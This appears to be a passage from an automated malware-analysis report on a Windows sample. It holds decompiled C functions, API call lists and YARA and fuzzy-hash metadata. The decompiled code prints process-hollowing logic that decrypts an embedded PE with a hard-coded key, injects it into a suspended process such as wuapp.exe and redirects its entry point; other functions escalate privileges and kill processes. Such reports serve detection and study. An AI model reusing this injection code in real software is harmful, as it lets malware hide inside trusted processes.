				if(_t8 == 0) {
					_push(__ebx);
					do {
						Sleep(0x2bc);
						_t11 = E00402930(Sleep, _t15, _t20, _t17,  &_v8);
						_t23 = _t23 + 0xc;
					} while (_t11 == 0);
				}
				return _v8;
			}

0x00403050
0x00403053
0x00403055
0x0040305c
0x0040305c
0x00403062
0x00403069
0x0040306e
0x00403073
0x00403075
0x00403080
0x00403085
0x0040308d
0x00403092
0x00403095
0x00403099
0x004030a2

APIs

Part of subcall function 00402930: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E

Sleep.KERNEL32(000002BC,00000000,004049E6,?), ref: 00403085

Strings

I@, xrefs: 0040305C, 00403060, 0040308B

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AdjustPrivilegeSleep
String ID: I@
API String ID: 2381171102-3008766272
Opcode ID: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
Instruction ID: ed7222478eb7be61e29de2bc31fce2cbcf9e59994bb1285db2a9842840863ed2
Opcode Fuzzy Hash: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
Instruction Fuzzy Hash: B1F05476501118BBDB109A86DD45E9BB7ACEB4A315F140066FD08E3142E2709F0486B5

Uniqueness

Uniqueness Score: -1.00%

Function 00402930, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00402930(void* __ebx, char* __ecx, intOrPtr _a4, intOrPtr* _a12) {
				char _v5;
				intOrPtr _t10;
				intOrPtr _t12;
				void* _t13;
				struct HINSTANCE__* _t17;

				_t14 = __ecx;
				_t13 = __ebx;
				_push(__ecx);
				RtlAdjustPrivilege(0x14, 1, 0,  &_v5); // executed
				if( *0x5d1314 == 0) {
					__eflags =  *0x5d1bb8;
					_push(_a4);
					if(__eflags == 0) {
						goto L4;
					} else {
						_t10 = E00405420(_t14, _t17, __eflags);
					}
					goto L5;
				} else {
					if( *0x5d1bb8 != 0) {
						__eflags =  *0x5d1318;
						if(__eflags == 0) {
							goto L9;
						} else {
							_t12 = E00405420(_t14, _t17, __eflags, _a4);
						}
						goto L10;
					} else {
						_t24 =  *0x5d1318;
						if( *0x5d1318 == 0) {
							L9:
							_push(_a4);
							_push(0xdd400);
							_push(0x4f3c38); // executed
							_t12 = E00405E60(_t14, _t17, __eflags); // executed
							L10:
							 *_a12 = _t12;
							__eflags = _t12;
							if(_t12 != 0) {
								goto L14;
							} else {
								 *0x5d1130 =  *0x5d1130 + 1;
								__eflags =  *0x5d1130;
								return _t12;
							}
						} else {
							_push(_a4);
							L4:
							_t10 = E00405B80(_t13, _t14, _t24);
							L5:
							 *_a12 = _t10;
							if(_t10 != 0) {
								L14:
								return 1;
							} else {
								return _t10;
							}
						}
					}
				}
			}

0x00402930
0x00402930
0x00402933
0x0040293e
0x0040294b
0x004029b5
0x004029bc
0x004029bf
0x00000000
0x004029c1
0x004029c1
0x004029c1
0x00000000
0x0040294d
0x00402954
0x00402977
0x0040297e
0x00000000
0x00402980
0x00402983
0x00402988
0x00000000
0x00402956
0x00402956
0x0040295d
0x0040298d
0x0040298d
0x00402990
0x00402995
0x0040299a
0x004029a2
0x004029a5
0x004029a7
0x004029a9
0x00000000
0x004029ab
0x004029ab
0x004029ab
0x004029b4
0x004029b4
0x0040295f
0x0040295f
0x00402962
0x00402962
0x00402967
0x0040296d
0x00402971
0x004029c8
0x004029d0
0x00402976
0x00402976
0x00402976
0x00402971
0x0040295d
0x00402954

APIs

RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AdjustPrivilege
String ID:
API String ID: 3260937286-0
Opcode ID: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
Instruction ID: 506e94688713331cfc66463232599238f62637629a90eb22369aba3845a8fa88
Opcode Fuzzy Hash: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
Instruction Fuzzy Hash: 3811C8B0702609BBDB215F50ED0DBA63764E710349F10017BFD09352E0E7BA99D8DA9E

Uniqueness

Uniqueness Score: -1.00%

Function 00407ED0, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407ED0(WCHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesW(_a4); // executed
				if(_t3 == 0xffffffff || (_t3 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x00407ed6
0x00407edf
0x00407eef
0x00407ee5
0x00407eeb
0x00407eeb

APIs

GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
Instruction ID: bc5cfff1355e279673e223a49d8db9145eaba15aaeeac5c753cdea018dd9536a
Opcode Fuzzy Hash: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
Instruction Fuzzy Hash: D2C0803040510C1BDF104568EC04255370CC701374F504B71FC1CD45F1D337BC924199

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405420, Relevance: 56.5, APIs: 27, Strings: 5, Instructions: 522
nativememorysleepCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00405420(char* __ecx, struct HINSTANCE__* __edx, void* __eflags, WCHAR* _a4) {
				CHAR* _v8;
				void _v12;
				CHAR* _v16;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _v24;
				void* _v28;
				void* _v32;
				CHAR** _v36;
				long _v40;
				struct _PROCESS_INFORMATION _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				long _v72;
				void* _v76;
				char _v80;
				char _v83;
				intOrPtr _v87;
				char _v88;
				intOrPtr _v92;
				long _v100;
				long _v108;
				intOrPtr _v128;
				char _v132;
				struct _STARTUPINFOW _v200;
				struct _CONTEXT _v916;
				int _t154;
				CHAR* _t155;
				CHAR* _t156;
				void* _t160;
				void* _t161;
				CHAR* _t162;
				CHAR* _t163;
				CHAR* _t175;
				CHAR* _t178;
				intOrPtr _t179;
				CHAR** _t180;
				CHAR* _t186;
				CHAR* _t190;
				CHAR* _t194;
				void* _t197;
				long _t199;
				CHAR* _t208;
				signed short _t211;
				CHAR* _t213;
				_Unknown_base(*)()* _t214;
				intOrPtr _t218;
				CHAR* _t225;
				CHAR* _t229;
				void* _t234;
				void* _t235;
				CHAR* _t250;
				CHAR* _t261;
				CHAR* _t266;
				CHAR** _t273;
				CHAR* _t275;
				CHAR* _t278;
				CHAR* _t284;
				signed int _t285;
				signed int _t286;
				struct HINSTANCE__* _t287;
				CHAR** _t288;
				CHAR* _t291;
				long _t294;
				CHAR* _t295;
				_Unknown_base(*)()** _t297;
				CHAR** _t299;
				intOrPtr _t301;
				long _t304;
				void* _t305;
				void* _t307;
				CHAR* _t309;
				signed short* _t310;
				CHAR** _t311;
				void* _t312;
				signed short* _t314;
				CHAR* _t315;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t324;

				_t287 = __edx;
				_t280 = __ecx;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				_v72 = 0;
				_v40 = 0;
				_v20 = 0;
				_v64 = 0;
				_v60 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = 0;
				_v8 = 0;
				_v76 = 0;
				_v24 = 0;
				asm("movups [ebp-0x80], xmm0");
				asm("movq [ebp-0x70], xmm0");
				asm("movq [ebp-0x60], xmm0");
				asm("movq [ebp-0x68], xmm0");
				asm("movups [ebp-0x34], xmm0");
				E00401BB0( &_v200, 0, 0x44);
				E00401BB0( &_v916, 0, 0x2cc);
				_v200.cb = 0x44;
				_t317 = _t316 + 0x18;
				_t324 =  *0x40c038 - 0x5a4d; // 0x6b7d
				if(_t324 != 0) {
					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
					_t317 = _t317 + 0x10;
				}
				_t154 = CreateProcessW(0, _a4, 0, 0, 0, 0x8000004, 0, 0,  &_v200,  &_v56);
				if(_t154 != 0) {
					_t155 =  *0x5d108c;
					__eflags = _t155;
					if(_t155 != 0) {
						_t280 =  &_v132;
						_t156 =  *_t155(_v56.hProcess, 0,  &_v132, 0x18, 0);
						__eflags = _t156;
						if(_t156 != 0) {
							goto L9;
						} else {
							_t175 = ReadProcessMemory(_v56.hProcess, _v128 + 8,  &_v12, 4,  &_v40);
							__eflags = _t175;
							if(_t175 == 0) {
								goto L8;
							} else {
								__eflags = _v40 - 4;
								if(_v40 != 4) {
									goto L8;
								} else {
									goto L21;
								}
							}
						}
					} else {
						_v916.ContextFlags = 0x10007;
						_t261 = GetThreadContext(_v56.hThread,  &_v916);
						__eflags = _t261;
						if(_t261 == 0) {
							L9:
							TerminateProcess(_v56.hProcess, 0);
							CloseHandle(_v56.hProcess);
							CloseHandle(_v56.hThread);
							_t160 = _v28;
							__eflags = _t160;
							if(_t160 != 0) {
								NtClose(_t160);
							}
							_t161 = _v32;
							__eflags = _t161;
							if(_t161 != 0) {
								NtClose(_t161);
							}
							_t162 = _v16;
							__eflags = _t162;
							if(_t162 != 0) {
								asm("cdq");
								E00407120(_t287, GetCurrentProcess(), _t162, _t287);
							}
							_t163 = _v8;
							__eflags = _t163;
							if(_t163 != 0) {
								asm("cdq");
								E00407120(_t287, GetCurrentProcess(), _t163, _t287);
							}
							__eflags = 0;
							return 0;
						} else {
							_t266 = ReadProcessMemory(_v56.hProcess, _v916.Ebx + 8,  &_v12, 4,  &_v40);
							__eflags = _t266;
							if(_t266 == 0) {
								L8:
								goto L9;
							} else {
								__eflags = _v40 - 4;
								if(_v40 == 4) {
									L21:
									_t178 = E00405A50(_t280, _v56.hProcess, _v12,  &_v20,  &_v72);
									_t318 = _t317 + 0x10;
									__eflags = _t178;
									if(_t178 == 0) {
										goto L8;
									} else {
										__eflags =  *0x40c038 - 0x5a4d; // 0x6b7d
										if(__eflags != 0) {
											goto L8;
										} else {
											_t179 =  *0x40c074; // 0x383538b7
											__eflags =  *((intOrPtr*)(_t179 + 0x40c038)) - 0x4550;
											_t180 = _t179 + 0x40c038;
											_v36 = _t180;
											if( *((intOrPtr*)(_t179 + 0x40c038)) != 0x4550) {
												goto L8;
											} else {
												__eflags =  *((intOrPtr*)(_t180 + 0x18)) - 0x10b;
												if( *((intOrPtr*)(_t180 + 0x18)) != 0x10b) {
													goto L8;
												} else {
													__eflags =  *(_t180 + 0xa0);
													_t304 =  *(_t180 + 0x50);
													_v68 =  *((intOrPtr*)(_t180 + 0x34));
													_t283 =  *((intOrPtr*)(_t180 + 0x28));
													_v80 =  *((intOrPtr*)(_t180 + 0x28));
													if(__eflags == 0) {
														goto L8;
													} else {
														_t294 = _v20;
														_v100 = _t294;
														__eflags = E00406F00(_t283, _t287, __eflags,  &_v28, 0xf001f, 0,  &_v100, 0x40, 0x8000000, 0);
														if(__eflags != 0) {
															goto L8;
														} else {
															_v108 = _t304;
															_t186 = E00406F00(_t283, _t287, __eflags,  &_v32, 0xf001f, 0,  &_v108, 0x40, 0x8000000, _t183);
															__eflags = _t186;
															if(_t186 != 0) {
																goto L8;
															} else {
																_v16 = _t186;
																_v64 = _t294;
																_t190 = E00406FE0(_t283, _t287, _v28, GetCurrentProcess(),  &_v16, 0, 0, 0,  &_v64, 1, _t186, 0x40);
																__eflags = _t190;
																if(_t190 != 0) {
																	goto L8;
																} else {
																	_v8 = _t190;
																	_v60 = _t304;
																	_t194 = E00406FE0(_t283, _t287, _v32, GetCurrentProcess(),  &_v8, 0, 0, 0,  &_v60, 1, _t190, 0x40);
																	__eflags = _t194;
																	if(_t194 != 0) {
																		goto L8;
																	} else {
																		_v24 = _t194;
																		_t197 = E00406FE0(_t283, _t287, _v32, _v56.hProcess,  &_v24, 0, 0, 0,  &_v60, 1, _t194, 0x40);
																		__eflags = _t197;
																		if(_t197 != 0) {
																			goto L8;
																		} else {
																			_t305 = VirtualAlloc(_t197, _t294, 0x3000, 4);
																			__eflags = _t305;
																			if(_t305 == 0) {
																				goto L8;
																			} else {
																				_t199 = ReadProcessMemory(_v56.hProcess, _v12, _t305, _t294, 0);
																				__eflags = _t199;
																				if(_t199 != 0) {
																					E00401640(_v16, _t305, _t294);
																					VirtualFree(_t305, 0, 0x8000);
																					_t273 = _v36;
																					_t295 =  *(_t273 + 6) & 0x0000ffff;
																					_t82 = _t273 + 0x18; // 0x18
																					_t307 = _t82 + ( *(_t273 + 0x14) & 0x0000ffff);
																					E00401640(_v8, 0x40c038, (_t295 + _t295 * 4 << 3) - 0x40c038 + _t307);
																					_t320 = _t318 + 0x18;
																					__eflags = _t295;
																					if(_t295 != 0) {
																						_t315 = _t307 + 0x14;
																						__eflags = _t315;
																						do {
																							E00401640( *((intOrPtr*)(_t315 - 8)) + _v8,  *_t315 + 0x40c038,  *((intOrPtr*)(_t315 - 4)));
																							_t320 = _t320 + 0xc;
																							_t315 =  &(_t315[0x28]);
																							_t295 = _t295 - 1;
																							__eflags = _t295;
																						} while (_t295 != 0);
																					}
																					_t284 = _v8;
																					_t275 =  *((intOrPtr*)(_t273 + 0x80)) + _t284;
																					__eflags = _t275;
																					while(1) {
																						_t208 = _t275[0xc];
																						__eflags = _t208;
																						if(_t208 != 0) {
																							goto L40;
																						}
																						__eflags = _t275[4] - _t208;
																						if(_t275[4] == _t208) {
																							_t311 = _v36;
																							_t287 = _v24;
																							_v68 = _t287 - _v68;
																							_t299 =  *((intOrPtr*)(_t311 + 0xa0)) + _t284;
																							_t218 =  *((intOrPtr*)(_t311 + 0xa4)) + _t299;
																							_v36 = _t299;
																							_v92 = _t218;
																							__eflags = _t299 - _t218;
																							if(_t299 < _t218) {
																								while(1) {
																									_t250 =  *_t299;
																									__eflags = _t250;
																									if(_t250 == 0) {
																										break;
																									}
																									_t288 =  &(_t299[1]);
																									_v20 = _t288;
																									_t314 =  &(_t299[2]);
																									_t278 =  &(_t250[_t284]);
																									_t291 =  *_t288 - 8 >> 1;
																									__eflags = _t291;
																									if(_t291 != 0) {
																										_t301 = _v68;
																										do {
																											_t285 =  *_t314 & 0x0000ffff;
																											_t291 = _t291 - 1;
																											__eflags = (_t285 & 0x0000f000) - 0x3000;
																											if((_t285 & 0x0000f000) == 0x3000) {
																												_t286 = _t285 & 0x00000fff;
																												_t114 =  &(_t278[_t286]);
																												 *_t114 =  &(_t278[_t286][_t301]);
																												__eflags =  *_t114;
																											}
																											_t314 =  &(_t314[1]);
																											__eflags = _t291;
																										} while (_t291 != 0);
																										_t284 = _v8;
																										_t299 = _v36;
																									}
																									_t299 = _t299 +  *_v20;
																									_v36 = _t299;
																									__eflags = _t299 - _v92;
																									if(_t299 < _v92) {
																										continue;
																									}
																									break;
																								}
																								_t287 = _v24;
																							}
																							_v88 = 0x68;
																							_v87 = _v80 + _t287;
																							_v83 = 0xc3;
																							E00401640( &(_v16[_v72]),  &_v88, 6);
																							_t225 = E00407120(_t287, _v56.hProcess, _v12, 0);
																							__eflags = _t225;
																							if(_t225 != 0) {
																								goto L8;
																							} else {
																								_v76 = _v12;
																								_t229 = E00406FE0(_t284, _t287, _v28, _v56.hProcess,  &_v76, 0, 0, 0,  &_v64, 1, 0, 0x40);
																								__eflags = _t229;
																								if(_t229 != 0) {
																									goto L8;
																								} else {
																									E004071A0(_t284, _t287, _v56.hThread);
																									Sleep(0x1388);
																									_t312 = VirtualAlloc(0, 0x138, 0x3000, 4);
																									__eflags = _t312;
																									if(_t312 != 0) {
																										E00401BB0(_t312, 0, 0x138);
																										asm("cdq");
																										E004074D0(_t284, _t287, _v56.hProcess, _v24, _t287, _t312, 0x138,  &_v80);
																										VirtualFree(_t312, 0, 0x8000);
																									}
																									CloseHandle(_v56);
																									CloseHandle(_v56.hThread);
																									_t234 = _v28;
																									__eflags = _t234;
																									if(_t234 != 0) {
																										NtClose(_t234);
																									}
																									_t235 = _v32;
																									__eflags = _t235;
																									if(_t235 != 0) {
																										NtClose(_t235);
																									}
																									asm("cdq");
																									E00407120(_t287, GetCurrentProcess(), _v16, _t287);
																									asm("cdq");
																									E00407120(_t287, GetCurrentProcess(), _v8, _t287);
																									_t147 =  &(_v56.dwProcessId); // 0x40306e
																									return  *_t147;
																								}
																							}
																						} else {
																							goto L40;
																						}
																						goto L69;
																						L40:
																						_t287 = E00408B00( &(_t208[_t284]));
																						_t320 = _t320 + 4;
																						_v20 = _t287;
																						__eflags = _t287;
																						if(_t287 == 0) {
																							goto L8;
																						} else {
																							_t284 = _v8;
																							_t309 =  &(_t284[ *_t275]);
																							_t297 =  &(_t284[_t275[0x10]]);
																							__eflags = _t309 - _t284;
																							_t310 =  ==  ? _t297 : _t309;
																							__eflags = _t310 - _t284;
																							if(_t310 == _t284) {
																								goto L8;
																							} else {
																								_t211 =  *_t310;
																								__eflags = _t211;
																								if(_t211 == 0) {
																									L49:
																									_t275 =  &(_t275[0x14]);
																									continue;
																								} else {
																									while(1) {
																										__eflags = _t211;
																										if(_t211 >= 0) {
																											_t213 = _t211 + 2 + _t284;
																											__eflags = _t213;
																										} else {
																											_t213 = _t211 & 0x0000ffff;
																										}
																										_t214 = GetProcAddress(_t287, _t213);
																										 *_t297 = _t214;
																										__eflags = _t214;
																										if(_t214 == 0) {
																											goto L8;
																										}
																										_t211 = _t310[2];
																										_t310 =  &(_t310[2]);
																										_t284 = _v8;
																										_t297 = _t297 + 4;
																										__eflags = _t211;
																										if(_t211 == 0) {
																											goto L49;
																										} else {
																											_t287 = _v20;
																											continue;
																										}
																										goto L69;
																									}
																									goto L8;
																								}
																							}
																						}
																						goto L69;
																					}
																				} else {
																					VirtualFree(_t305, _t199, 0x8000);
																					goto L8;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					return _t154;
				}
				L69:
			}

0x00405420
0x00405420
0x0040542a
0x0040542d
0x0040543c
0x00405446
0x0040544d
0x00405454
0x0040545b
0x00405462
0x00405469
0x00405470
0x00405477
0x0040547e
0x00405485
0x0040548c
0x00405490
0x00405495
0x0040549a
0x0040549f
0x004054a3
0x004054b6
0x004054c0
0x004054ca
0x004054cd
0x004054d4
0x004054e7
0x004054ec
0x004054ec
0x0040550e
0x00405516
0x0040551d
0x0040552a
0x0040552c
0x004055eb
0x004055f4
0x004055f6
0x004055f8
0x00000000
0x004055fa
0x00405614
0x00405616
0x00405618
0x00000000
0x0040561e
0x0040561e
0x00405622
0x00000000
0x00000000
0x00000000
0x00000000
0x00405622
0x00405618
0x00405532
0x00405538
0x00405546
0x0040554c
0x0040554e
0x00405583
0x00405588
0x00405597
0x0040559c
0x0040559e
0x004055a1
0x004055a3
0x004055a6
0x004055a6
0x004055ac
0x004055af
0x004055b1
0x004055b4
0x004055b4
0x004055ba
0x004055bd
0x004055bf
0x004055c1
0x004055c7
0x004055c7
0x004055cc
0x004055cf
0x004055d1
0x004055d3
0x004055d9
0x004055d9
0x004055e0
0x004055e6
0x00405550
0x0040556d
0x0040556f
0x00405571
0x0040557d
0x00000000
0x00405573
0x00405573
0x00405577
0x00405628
0x00405636
0x0040563b
0x0040563e
0x00405640
0x00000000
0x00405646
0x00405646
0x0040564d
0x00000000
0x00405653
0x00405653
0x00405658
0x00405662
0x00405668
0x0040566b
0x00000000
0x00405671
0x00405676
0x0040567a
0x00000000
0x00405680
0x00405680
0x0040568a
0x0040568d
0x00405690
0x00405693
0x00405696
0x00000000
0x0040569c
0x0040569c
0x004056b6
0x004056bf
0x004056c1
0x00000000
0x004056c7
0x004056d2
0x004056e1
0x004056e6
0x004056e8
0x00000000
0x004056ee
0x004056f3
0x00405703
0x00405711
0x00405716
0x00405718
0x00000000
0x0040571e
0x00405723
0x00405733
0x00405741
0x00405746
0x00405748
0x00000000
0x0040574e
0x00405753
0x0040576a
0x0040576f
0x00405771
0x00000000
0x00405777
0x00405786
0x00405788
0x0040578a
0x00000000
0x00405790
0x0040579a
0x0040579c
0x0040579e
0x004057b7
0x004057c7
0x004057cd
0x004057d0
0x004057d4
0x004057db
0x004057f3
0x004057f8
0x004057fb
0x004057fd
0x004057ff
0x004057ff
0x00405802
0x00405814
0x00405819
0x0040581c
0x0040581f
0x0040581f
0x0040581f
0x00405802
0x0040582a
0x0040582d
0x0040582d
0x00405830
0x00405830
0x00405833
0x00405835
0x00000000
0x00000000
0x00405837
0x0040583a
0x004058ad
0x004058b0
0x004058b8
0x004058c7
0x004058c9
0x004058cb
0x004058ce
0x004058d1
0x004058d3
0x004058d5
0x004058d5
0x004058d7
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058de
0x004058e1
0x004058e6
0x004058ec
0x004058ec
0x004058ee
0x004058f0
0x004058f3
0x004058f3
0x004058f6
0x004058fe
0x00405903
0x00405905
0x0040590b
0x0040590b
0x0040590b
0x0040590b
0x0040590e
0x00405911
0x00405911
0x00405915
0x00405918
0x00405918
0x0040591e
0x00405920
0x00405923
0x00405926
0x00000000
0x00000000
0x00000000
0x00405926
0x00405928
0x00405928
0x00405930
0x00405934
0x00405944
0x00405948
0x00405958
0x0040595d
0x0040595f
0x00000000
0x00405965
0x0040596e
0x00405985
0x0040598a
0x0040598c
0x00000000
0x00405992
0x00405995
0x0040599f
0x004059b9
0x004059bb
0x004059bd
0x004059c7
0x004059dc
0x004059e2
0x004059ef
0x004059ef
0x004059fe
0x00405a03
0x00405a05
0x00405a08
0x00405a0a
0x00405a0d
0x00405a0d
0x00405a13
0x00405a16
0x00405a18
0x00405a1b
0x00405a1b
0x00405a2a
0x00405a30
0x00405a38
0x00405a3e
0x00405a43
0x00405a4c
0x00405a4c
0x0040598c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040583c
0x00405844
0x00405846
0x00405849
0x0040584c
0x0040584e
0x00000000
0x00405854
0x00405854
0x0040585c
0x0040585e
0x00405860
0x00405862
0x00405865
0x00405867
0x00000000
0x0040586d
0x0040586d
0x0040586f
0x00405871
0x004058a8
0x004058a8
0x00000000
0x00405873
0x00405873
0x00405873
0x00405875
0x0040587f
0x0040587f
0x00405877
0x00405877
0x00405877
0x00405883
0x00405889
0x0040588b
0x0040588d
0x00000000
0x00000000
0x00405893
0x00405896
0x00405899
0x0040589c
0x0040589f
0x004058a1
0x00000000
0x004058a3
0x004058a3
0x00000000
0x004058a3
0x00000000
0x004058a1
0x00000000
0x00405873
0x00405871
0x00405867
0x00000000
0x0040584e
0x004057a0
0x004057a7
0x00000000
0x004057a7
0x0040579e
0x0040578a
0x00405771
0x00405748
0x00405718
0x004056e8
0x004056c1
0x00405696
0x0040567a
0x0040566b
0x0040564d
0x00000000
0x00000000
0x00000000
0x00405577
0x00405571
0x0040554e
0x0040551c
0x0040551c
0x0040551c
0x00000000

APIs

CreateProcessW.KERNEL32 ref: 0040550E
GetThreadContext.KERNEL32(?,?,I@,00000000,?,?,?,?,?,?), ref: 00405546
ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 0040556D
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00405588
CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00405597
CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0040559C
NtClose.NTDLL(00000000), ref: 004055A6
NtClose.NTDLL(00000000), ref: 004055B4
GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055C4
GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055D6
ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 00405614
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00405707
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405737
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405780
ReadProcessMemory.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040579A
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?), ref: 004057A7
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004057C7
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00405883
Sleep.KERNEL32(00001388,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,?,00000000,00000000), ref: 0040599F
VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004), ref: 004059B3
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,00000000,00000138,?), ref: 004059EF
CloseHandle.KERNEL32(?), ref: 004059FE
CloseHandle.KERNEL32(?), ref: 00405A03
NtClose.NTDLL(00000000), ref: 00405A0D
NtClose.NTDLL(00000000), ref: 00405A1B
GetCurrentProcess.KERNEL32(00000000), ref: 00405A2D
GetCurrentProcess.KERNEL32(00000000,?,00000000), ref: 00405A3B

Strings

I@, xrefs: 00405529
D, xrefs: 004054C0
h, xrefs: 00405930
0125789244697858, xrefs: 004054E2
n0@, xrefs: 00405A43

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$Close$Current$Virtual$Handle$FreeMemoryRead$Alloc$AddressContextCreateProcSleepTerminateThread
String ID: 0125789244697858$D$h$n0@$I@
API String ID: 937709717-631519299
Opcode ID: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
Instruction ID: 0427067da74405bbc224276ff2be7b89c7662c3791b2ba589faee8c975da3b6f
Opcode Fuzzy Hash: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
Instruction Fuzzy Hash: CF124971E00609ABEB20DB94DD45FAFBBB9EF04704F144166FA04B72D1E778AD448B68

Uniqueness

Uniqueness Score: -1.00%

Function 004087C0, Relevance: 7.6, APIs: 5, Instructions: 74nativefileCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00408823
NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 0040887E
NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004088A0
NtClose.NTDLL(00000000), ref: 004088AD
NtClose.NTDLL(00000000), ref: 004088B9

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFilePath$CreateNameName_Write
String ID:
API String ID: 589302162-0
Opcode ID: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
Instruction ID: cdde318fc824664ac6a874490e4e1e0a00434436370c8205e3f3d3f15e695731
Opcode Fuzzy Hash: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
Instruction Fuzzy Hash: D5310CB1D4020DBBEB10DF90DD49BEEBBB8EB04704F20415AF904B62D0D7B566589F99

Uniqueness

Uniqueness Score: -1.00%

Function 00408730, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00408730(char _a4) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* _t23;
				void* _t25;
				void* _t29;

				_t1 =  &_a4; // 0x404a23
				_v16 =  *_t1;
				_v8 = 0;
				_v40 = 0x18;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0;
				if(NtOpenProcess( &_v8, 1,  &_v40,  &_v16) == 0) {
					_t23 = _v8;
					if(_t23 == 0) {
						goto L1;
					} else {
						_t25 =  *0x5d10b0(_t23, 0, _t29);
						NtClose(_v8);
						return 0 | _t25 == 0x00000000;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00408736
0x00408739
0x00408743
0x00408750
0x00408758
0x0040875f
0x00408766
0x0040876d
0x00408774
0x0040877b
0x0040878a
0x00408792
0x00408797
0x00000000
0x00408799
0x0040879d
0x004087a8
0x004087b9
0x004087b9
0x0040878c
0x0040878c
0x00408791
0x00408791

APIs

NtOpenProcess.NTDLL(00000000,00000001,?,?), ref: 00408782
NtTerminateProcess.NTDLL(00000000,00000000), ref: 0040879D
NtClose.NTDLL(00000000), ref: 004087A8

Strings

#J@, xrefs: 00408736

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseOpenTerminate
String ID: #J@
API String ID: 4223285941-3103836084
Opcode ID: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
